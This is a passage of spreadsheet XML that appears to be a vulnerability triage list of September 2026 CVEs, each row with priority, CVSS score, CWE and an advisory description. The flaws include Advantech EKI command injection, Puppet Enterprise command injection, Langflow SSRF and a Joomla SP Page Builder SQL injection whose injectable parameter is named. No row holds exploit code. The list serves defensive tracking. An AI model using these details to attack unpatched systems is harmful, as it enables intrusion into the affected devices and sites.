      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73163</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73164</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73164</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73165</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73165</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73166</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary code on the device, including OS commands as root.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73166</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73167</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73167</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73170</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability in the Modbus CSV import workflow of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary Lua code on the device via a crafted imported file.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73170</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73171</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-73: External Control of File Name or Path vulnerability in the backup-restore workflow of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote authenticated attacker to overwrite arbitrary files on the device filesystem by uploading a crafted backup archive through the web management interface.</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73171</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73176</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73176</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73177</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-345: Insufficient Verification of Data Authenticity vulnerability in the firmware upgrade mechanism of the Advantech EKI-1242EIMS in firmware version V1.06.01. The device accepts firmware images through the authenticated web management interface without performing any cryptographic signature or certificate verification. An authenticated administrator-level attacker can install arbitrary modified firmware on the device, enabling full persistent compromise of the platform.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73177</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73454</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with gRPC Network Security Interface (gNSI) Credentialz configured, a specially crafted request can cause unintended modifications to the target account's properties. This may result in the account being assigned elevated privileges or access beyond what an administrator intended.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73454</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78375</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Authenticated Privileged SQL Injection in the Content Plugin of SP Page Builder (Free and Pro) 5.2.1 - 6.9.0 - plgContentSppagebuilder::onContentAfterSave() read jform[attribs][sppagebuilder_article_id] from the request and concatenated it directly into the WHERE view_id = ... clause of a query against #__sppagebuilder without quoting or type casting. Joomla's ARRAY input filter does not sanitise element values, as InputFilter::clean() returns (array) $source with the elements untouched, so the entire payload could be delivered in a single POST field. The affected block also executed before the com_content.article context test, so it ran on every onContentAfterSave event regardless of which component triggered the save. An attacker could perform time-based blind SQL injection to read arbitrary database contents, including the #__users and #__session tables.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78375</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81213</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to obtain sensitive information from internal network resources due to improper validation of user-supplied URLs.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81213</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82765</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability exists in Contec FX5000 series, FX4000 series, and FX3000 series. If this vulnerability is exploited, arbitrary files on the server may be viewed and/or altered by an attacker who can access the product via FTP.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82765</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82768</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability exists in SGA1000. If this vulnerability is exploited, arbitrary files on the server may be viewed and/or altered by an attacker who can access the product via FTP.</t>
        </is>
      </c>
      <c r="S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82768</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82793</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type issue exists in Contec CAN 2.0B Communication Wireless LAN / USB Converter Unit. If a specially crafted file is uploaded by a remote authenticated attacker, arbitrary code may be executed on the product.</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82793</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85979</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>Affected versions of Puppet Enterprise contain a command injection vulnerability. An authenticated user with Puppet administrative privileges can inject arbitrary shell commands by providing a specially crafted value for this parameter, which is passed to a shell execution context without sufficient sanitization. Because the resulting commands are executed with root privileges, successful exploitation can lead to full compromise of the affected system. 
It affects Puppet Enterprise 2023.8.0 through 2023.8.10 and Puppet Enterprise 2025.0.0 through 2025.11.2.
This has been resolved in Puppet Enterprise 2023.8.11 and Puppet Enterprise 2025.11.3.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85979</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86762</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 does not apply the CheckUserIsActivated middleware to the `api` middleware group in app/Http/Kernel.php, and deactivating a user does not revoke that user's Passport personal access tokens. As a result, although a deactivated account is correctly refused at web login, its existing API token continues to authenticate and to grant read and write access to the REST API (assets, users, licenses, etc.) at the account's prior permission level until the token expires. A deactivated account that retains user-management permissions can re-activate itself through the API, permanently defeating the deactivation control.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86762</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86770</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr"/>
